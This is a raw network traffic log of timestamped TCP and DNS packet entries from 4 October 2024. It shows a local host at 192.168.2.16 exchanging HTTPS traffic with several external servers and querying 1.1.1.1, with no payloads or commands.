                                                                                                        Oct 4, 2024 15:11:38.067193031 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.067238092 CEST49748443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:38.067246914 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.067641020 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.067672014 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.067692041 CEST49748443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:38.067701101 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.067742109 CEST49748443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:38.067750931 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.069804907 CEST5263453192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:38.071798086 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.071844101 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.071863890 CEST49748443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:38.071883917 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.071924925 CEST49748443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:38.076328039 CEST53526341.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.076431990 CEST5263453192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:38.076478958 CEST5263453192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:38.081377983 CEST53526341.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.154311895 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.154383898 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.154417992 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.154495001 CEST49748443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:38.154521942 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.154546022 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.154567003 CEST49748443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:38.154596090 CEST49748443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:38.154947042 CEST49748443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:38.154967070 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.166306973 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.166343927 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.166590929 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.166729927 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.166750908 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.167124033 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.167146921 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.167207956 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.167375088 CEST52637443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:38.167423964 CEST44352637104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.167517900 CEST52637443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:38.167618990 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.167629004 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.167824030 CEST52637443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:38.167834044 CEST44352637104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.521354914 CEST53526341.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.522324085 CEST5263453192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:38.528440952 CEST53526341.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.528537035 CEST5263453192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:38.624501944 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.624816895 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.624828100 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.625897884 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.625994921 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.626910925 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.626975060 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.627078056 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.627084970 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.640571117 CEST44352637104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.640821934 CEST52637443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:38.640845060 CEST44352637104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.641932964 CEST44352637104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.642000914 CEST52637443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:38.642272949 CEST52637443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:38.642338037 CEST44352637104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.642396927 CEST52637443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:38.646423101 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.646579027 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.646589994 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.647650003 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.647716045 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.648544073 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.648608923 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.648710012 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.648715973 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.681462049 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.683398962 CEST44352637104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.697441101 CEST52637443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:38.697453976 CEST44352637104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.698209047 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.722527027 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.722609997 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.722635984 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.722678900 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.722687960 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.722697973 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.722728968 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.722733021 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.722783089 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.722786903 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.723131895 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.723157883 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.723167896 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.723180056 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.723213911 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.723582983 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.730004072 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.730102062 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.730115891 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.745419979 CEST52637443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:38.772804022 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.772845984 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.772871017 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.772907972 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.772914886 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.772928953 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.773062944 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.773497105 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.773528099 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.773622990 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.773632050 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.773827076 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.773833990 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.774106026 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.774153948 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.774161100 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.777435064 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.777910948 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.777971029 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.777983904 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.785062075 CEST44352637104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.785157919 CEST44352637104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.785298109 CEST52637443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:38.785581112 CEST52637443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:38.785600901 CEST44352637104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.787128925 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:38.787168026 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.787348986 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:38.787494898 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:38.787507057 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.810736895 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.810753107 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.810796022 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.810807943 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.810832977 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.810877085 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.810889959 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.810920000 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.810956001 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.812412024 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.812434912 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.812505007 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.812522888 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.812621117 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.825438976 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.863199949 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.863282919 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.863337040 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.863356113 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.863465071 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.863506079 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.863512039 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.864077091 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.864120960 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.864128113 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.864188910 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.864232063 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.864238024 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.864764929 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.864799023 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.864845037 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.864851952 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.865015984 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.865051031 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.865056992 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.865098000 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.865552902 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.865677118 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.865703106 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.865755081 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.865762949 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.865812063 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.866378069 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.866453886 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.866658926 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.866693020 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.866728067 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.866728067 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.866734982 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.867326975 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.867405891 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.867413044 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.867441893 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.867497921 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.867717981 CEST52636443192.168.2.16104.17.25.14
                                                                                                        Oct 4, 2024 15:11:38.867733002 CEST44352636104.17.25.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.881314993 CEST52640443192.168.2.16104.17.24.14
                                                                                                        Oct 4, 2024 15:11:38.881364107 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.881441116 CEST52640443192.168.2.16104.17.24.14
                                                                                                        Oct 4, 2024 15:11:38.881633043 CEST52640443192.168.2.16104.17.24.14
                                                                                                        Oct 4, 2024 15:11:38.881643057 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.897588968 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.897623062 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.897721052 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.897728920 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.897799015 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.899427891 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.899442911 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.899492979 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.899497986 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.899548054 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.899548054 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.900015116 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.900069952 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.900079966 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.900103092 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.900383949 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.901345015 CEST52635443192.168.2.16151.101.66.137
                                                                                                        Oct 4, 2024 15:11:38.901357889 CEST44352635151.101.66.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.940689087 CEST52641443192.168.2.16151.101.130.137
                                                                                                        Oct 4, 2024 15:11:38.940741062 CEST44352641151.101.130.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.941015959 CEST52641443192.168.2.16151.101.130.137
                                                                                                        Oct 4, 2024 15:11:38.941015959 CEST52641443192.168.2.16151.101.130.137
                                                                                                        Oct 4, 2024 15:11:38.941050053 CEST44352641151.101.130.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.246949911 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.247303963 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.247323990 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.247730970 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.248358965 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.248358965 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.248372078 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.248430967 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.302422047 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.340508938 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.340847015 CEST52640443192.168.2.16104.17.24.14
                                                                                                        Oct 4, 2024 15:11:39.340857029 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.341942072 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.342017889 CEST52640443192.168.2.16104.17.24.14
                                                                                                        Oct 4, 2024 15:11:39.342632055 CEST52640443192.168.2.16104.17.24.14
                                                                                                        Oct 4, 2024 15:11:39.342705965 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.342849970 CEST52640443192.168.2.16104.17.24.14
                                                                                                        Oct 4, 2024 15:11:39.342855930 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.382416964 CEST52640443192.168.2.16104.17.24.14
                                                                                                        Oct 4, 2024 15:11:39.399081945 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.399154902 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.399185896 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.399216890 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.399216890 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.399229050 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.399262905 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.399658918 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.399765015 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.399772882 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.399885893 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.399919987 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.399943113 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.399949074 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.400015116 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.400041103 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.427962065 CEST44352641151.101.130.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.428380013 CEST52641443192.168.2.16151.101.130.137
                                                                                                        Oct 4, 2024 15:11:39.428390980 CEST44352641151.101.130.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.429436922 CEST44352641151.101.130.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.429560900 CEST52641443192.168.2.16151.101.130.137
                                                                                                        Oct 4, 2024 15:11:39.429861069 CEST52641443192.168.2.16151.101.130.137
                                                                                                        Oct 4, 2024 15:11:39.429922104 CEST44352641151.101.130.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.430104017 CEST52641443192.168.2.16151.101.130.137
                                                                                                        Oct 4, 2024 15:11:39.430109024 CEST44352641151.101.130.137192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.446460962 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.446470022 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.467016935 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.467061996 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.467092991 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.467120886 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.467159986 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.467159986 CEST52640443192.168.2.16104.17.24.14
                                                                                                        Oct 4, 2024 15:11:39.467159986 CEST52640443192.168.2.16104.17.24.14
                                                                                                        Oct 4, 2024 15:11:39.467181921 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.467236042 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.467267036 CEST52640443192.168.2.16104.17.24.14
                                                                                                        Oct 4, 2024 15:11:39.467273951 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.467406034 CEST52640443192.168.2.16104.17.24.14
                                                                                                        Oct 4, 2024 15:11:39.467442989 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.472424030 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.472517014 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.472585917 CEST52640443192.168.2.16104.17.24.14
                                                                                                        Oct 4, 2024 15:11:39.472593069 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.472615004 CEST44352640104.17.24.14192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.472712040 CEST52640443192.168.2.16104.17.24.14
                                                                                                        Oct 4, 2024 15:11:39.478429079 CEST52641443192.168.2.16151.101.130.137
                                                                                                        Oct 4, 2024 15:11:39.486517906 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.486550093 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.486599922 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.486613989 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.486685991 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.486737967 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.486936092 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.486962080 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.487046957 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.487054110 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.487231016 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.487472057 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.487517118 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.487552881 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.487559080 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.487608910 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.487726927 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.487734079 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.488444090 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.488470078 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.488497019 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.488509893 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.488574028 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.488614082 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.488619089 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.488696098 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.489332914 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.489382029 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.489432096 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.489448071 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.489475965 CEST44352639104.18.95.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.489537954 CEST52639443192.168.2.16104.18.95.41
                                                                                                        Oct 4, 2024 15:11:39.489543915 CEST44352639104.18.95.41192.168.2.16
